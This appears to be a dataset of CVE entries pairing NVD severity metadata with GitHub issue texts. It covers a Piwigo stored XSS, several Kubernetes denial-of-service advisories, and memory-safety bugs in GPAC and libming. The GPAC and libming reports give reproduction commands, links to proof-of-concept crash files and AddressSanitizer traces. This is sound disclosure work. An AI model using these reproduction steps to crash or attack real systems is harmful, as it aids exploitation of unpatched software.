2019-07-06T00:25:31Z
2019-07-07T16:01:07Z
https://github.com/gpac/gpac/issues/1271
464,800,676
1,271
CVE-2020-9467
2020-03-26T20:15:11.427
Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159191/Piwigo-2.10.1-Cross-Site-Scripting.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1168
[ "Patch", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
on `file` param. No worry with an admin, but this method can be used by a community user as well. Originally reported by Zak S. see CVE-2020-9467
stored XSS with pwg.images.setInfo
https://api.github.com/repos/Piwigo/Piwigo/issues/1168/comments
1
2020-03-24T13:03:01Z
2020-03-28T05:54:16Z
https://github.com/Piwigo/Piwigo/issues/1168
586,943,552
1,168
CVE-2020-8551
2020-03-27T15:15:12.647
The Kubelet component in versions 1.15.0-1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port 10255, and the authenticated HTTPS API typically served on port 10250.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89377" }, { "source": "[email protected]", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "44ECF71D-7483-45B0-8BF5-92284C11696C", "versionEndExcluding": null, "versionEndIncluding": "1.15.9", "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "02C07F21-ECB7-4BD2-85AF-C2BB24F175FF", "versionEndExcluding": null, "versionEndIncluding": "1.16.6", "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE0FF258-1EFA-4FF0-84C7-B2976BD70BD3", "versionEndExcluding": null, "versionEndIncluding": "1.17.2", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/89377
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) (Medium) The Kubelet has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port 10255, and the authenticated HTTPS API typically served on port 10250. ### Am I vulnerable? If an attacker can make a request to an unpatched kubelet, then you may be vulnerable to this. #### Affected Versions - kubelet v1.17.0 - v1.17.2 - kubelet v1.16.0 - v1.16.6 - kubelet v1.15.0 - v1.15.9 ### How do I mitigate this vulnerability? Limit access to the Kubelet API or patch the Kubelet. #### Fixed Versions - v1.17.3 - v1.16.7 - v1.15.10 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Henrik Schmidt /area security /kind bug /committee product-security /sig node /area kubelet
CVE-2020-8551: Kubelet DoS via API
https://api.github.com/repos/kubernetes/kubernetes/issues/89377/comments
7
2020-03-23T18:34:40Z
2021-12-02T22:55:29Z
https://github.com/kubernetes/kubernetes/issues/89377
586,428,637
89,377
CVE-2020-8552
2020-03-27T15:15:12.757
The Kubernetes API server component in versions prior to 1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via successful API requests.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89378" }, { "source": "[email protected]", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "07761E41-21F4-466F-A602-4DC9BD1257CE", "versionEndExcluding": null, "versionEndIncluding": "1.15.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "02C07F21-ECB7-4BD2-85AF-C2BB24F175FF", "versionEndExcluding": null, "versionEndIncluding": "1.16.6", "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE0FF258-1EFA-4FF0-84C7-B2976BD70BD3", "versionEndExcluding": null, "versionEndIncluding": "1.17.2", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/89378
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) (Medium) The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. ### Am I vulnerable? If an attacker that can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to v1.14, this was possible via unauthenticated requests by default. #### Affected Versions - kube-apiserver v1.17.0 - v1.17.2 - kube-apiserver v1.16.0 - v1.16.6 - kube-apiserver < v1.15.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: - Preventing unauthenticated or unauthorized access to all apis - The apiserver should auto restart if it OOMs #### Fixed Versions - v1.17.3 - v1.16.7 - v1.15.10 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Gus Lees (Amazon) /area security /kind bug /committee product-security /sig api-machinery
CVE-2020-8552: apiserver DoS (oom)
https://api.github.com/repos/kubernetes/kubernetes/issues/89378/comments
4
2020-03-23T18:35:34Z
2021-12-02T22:55:22Z
https://github.com/kubernetes/kubernetes/issues/89378
586,429,123
89,378
CVE-2019-11254
2020-04-01T21:15:13.397
The Kubernetes API Server component in versions 1.1-1.14, and versions prior to 1.15.10, 1.16.7 and 1.17.3 allows an authorized user who sends malicious YAML payloads to cause the kube-apiserver to consume excessive CPU cycles while parsing YAML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89535" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "87849953-B423-4E3B-A977-A62A88B40037", "versionEndExcluding": "1.15.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D26FF8F-C943-41DE-A97D-89E8C7AB6348", "versionEndExcluding": "1.16.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "95F48D52-C95F-4BBE-87C3-476F8058A37E", "versionEndExcluding": "1.17.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/89535
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVE-2019-11254 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML payloads to cause kube-apiserver to consume excessive CPU cycles while parsing YAML. The issue was discovered via the fuzz test kubernetes/kubernetes#83750. **Affected components:** Kubernetes API server **Affected versions:** <= v1.15.9, resolved in 1.15.10 by https://github.com/kubernetes/kubernetes/pull/87640 v1.16.0-v1.16.7, resolved in 1.16.8 by https://github.com/kubernetes/kubernetes/pull/87639 v1.17.0-v1.17.2, resolved in 1.17.3 by https://github.com/kubernetes/kubernetes/pull/87637 Fixed in master by https://github.com/kubernetes/kubernetes/pull/87467 **How do I mitigate this vulnerability?** Prior to upgrading, these vulnerabilities can be mitigated by preventing unauthenticated or unauthorized access to kube-apiserver.
CVE-2019-11254: kube-apiserver Denial of Service vulnerability from malicious YAML payloads
https://api.github.com/repos/kubernetes/kubernetes/issues/89535/comments
2
2020-03-26T18:55:26Z
2022-08-23T02:18:32Z
https://github.com/kubernetes/kubernetes/issues/89535
588,652,998
89,535
CVE-2020-11558
2020-04-05T20:15:12.650
An issue was discovered in libgpac.a in GPAC 0.8.0, as demonstrated by MP4Box. audio_sample_entry_Read in isomedia/box_code_base.c does not properly decide when to make gf_isom_box_del calls. This leads to various use-after-free outcomes involving mdia_Read, gf_isom_delete_movie, and gf_isom_parse_movie_boxes.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/6063b1a011c3f80cee25daade18154e15e4c058c" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1440" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1440
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi GPAC Team, I found 3 new UAF bugs on the lastest commit 56eaea8 of GPAC version 0.8.0. I think it is probably due to **an imcomplete fix** of the UAF bug https://github.com/gpac/gpac/issues/1340. Actually, these new bugs share the same buggy function which is `gf_isom_box_del()` in src/isomedia/box_funcs.c with https://github.com/gpac/gpac/issues/1340, but have different alloc function `esds_New()` in `src/isomedia/box_code_base.c` (instead of `stco_New()`). Command: `MP4Box -info $POC` or `MP4Box -diso $POC` #### 1) UAF Bug 1 PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_56eaea8/uaf1 ASAN says: ~~~ ================================================================= ==31565==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000dde8 at pc 0x0000006c601e bp 0x7fff726c3b70 sp 0x7fff726c3b60 READ of size 8 at 0x60400000dde8 thread T0 #0 0x6c601d in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 #1 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #2 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #3 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #4 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #5 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #6 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #7 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #8 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #9 0x6c72cd in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1427 #10 0xae0b0f in mdia_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3021 #11 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #12 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #13 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #14 0xaeffe8 in trak_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:7188 #15 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #16 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #17 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #18 0xae3444 in moov_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3749 #19 0x6c7764 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #20 0x6c7764 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #21 0x6c7fb4 in gf_isom_parse_root_box /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:42 #22 0x6dd940 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:207 #23 0x6e05d3 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:195 #24 0x6e05d3 in gf_isom_open_file /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:616 #25 0x43375d in mp4boxMain /home/dungnguyen/fuzz/gpac/applications/mp4box/main.c:4814 #26 0x7fca8b87382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #27 0x41e4f8 in _start (/home/dungnguyen/PoCs/gpac_new/MP4Box+0x41e4f8) 0x60400000dde8 is located 24 bytes inside of 48-byte region [0x60400000ddd0,0x60400000de00) freed by thread T0 here: #0 0x7fca8c61732a in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9832a) #1 0x6c5f9f in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1512 previously allocated by thread T0 here: #0 0x7fca8c617662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662) #1 0xadb68d in esds_New /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:1287 SUMMARY: AddressSanitizer: heap-use-after-free /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 gf_isom_box_del ~~~
3 UAF bugs in box_funcs.c
https://api.github.com/repos/gpac/gpac/issues/1440/comments
4
2020-03-24T17:16:05Z
2020-03-26T19:28:46Z
https://github.com/gpac/gpac/issues/1440
587,134,103
1,440
CVE-2020-11894
2020-04-19T19:15:12.477
Ming (aka libming) 0.4.8 has a heap-based buffer over-read (8 bytes) in the function decompileIF() in decompile.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/196" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/196
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
./swftocxx $poc [segmentaion_fault_decompile_569-out_of_bound-idx:0x1199-0xb.zip](https://github.com/libming/libming/files/4490660/segmentaion_fault_decompile_569-out_of_bound-idx.0x1199-0xb.zip) ``` root@ubuntu:/home/tim/libming/util# ../../libming-asan/util/swftocxx overflows/segmentaion_fault_decompile_569-out_of_bound-idx\:0x1199-0xb header indicates a filesize of 1484 but filesize is 228 #include <mingpp.h> main(){ SWFMovie* m = new SWFMovie(10); Ming_setScale(1.0); m->setRate(24.000000); m->setDimension(-9480, 8000); // SWF_PLACEOBJECT3 Stream out of sync after parse of blocktype 12 (SWF_DOACTION). 223 but expecting 200. // SWF_DOACTION ================================================================= ==3097==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d0000008a8 at pc 0x5645c2842407 bp 0x7fffda6e8470 sp 0x7fffda6e8460 READ of size 8 at 0x61d0000008a8 thread T0 #0 0x5645c2842406 in decompileIF /home/tim/libming-asan/util/decompile.c:2473 #1 0x5645c2846ea3 in decompileAction /home/tim/libming-asan/util/decompile.c:3335 #2 0x5645c284732e in decompileActions /home/tim/libming-asan/util/decompile.c:3494 #3 0x5645c28467ee in decompileSETTARGET /home/tim/libming-asan/util/decompile.c:3169 #4 0x5645c284725e in decompileAction /home/tim/libming-asan/util/decompile.c:3465 #5 0x5645c284732e in decompileActions /home/tim/libming-asan/util/decompile.c:3494 #6 0x5645c2840d13 in decompile_SWITCH /home/tim/libming-asan/util/decompile.c:2235 #7 0x5645c2842f7b in decompileIF /home/tim/libming-asan/util/decompile.c:2594 #8 0x5645c2846ea3 in decompileAction /home/tim/libming-asan/util/decompile.c:3335 #9 0x5645c284732e in decompileActions /home/tim/libming-asan/util/decompile.c:3494 #10 0x5645c2847464 in decompile5Action /home/tim/libming-asan/util/decompile.c:3517 #11 0x5645c283348e in outputSWF_DOACTION /home/tim/libming-asan/util/outputscript.c:1551 #12 0x5645c2835a92 in outputBlock /home/tim/libming-asan/util/outputscript.c:2083 #13 0x5645c2836b88 in readMovie /home/tim/libming-asan/util/main.c:281 #14 0x5645c2837322 in main /home/tim/libming-asan/util/main.c:354 #15 0x7fbdee9fcb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #16 0x5645c2829469 in _start (/home/tim/libming-asan/util/.libs/swftocxx+0x14469) 0x61d0000008a8 is located 8 bytes to the right of 2080-byte region [0x61d000000080,0x61d0000008a0) allocated by thread T0 here: #0 0x7fbdeef4f63e in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c63e) #1 0x5645c2842e26 in decompileIF /home/tim/libming-asan/util/decompile.c:2587 #2 0x5645c2846ea3 in decompileAction /home/tim/libming-asan/util/decompile.c:3335 #3 0x5645c284732e in decompileActions 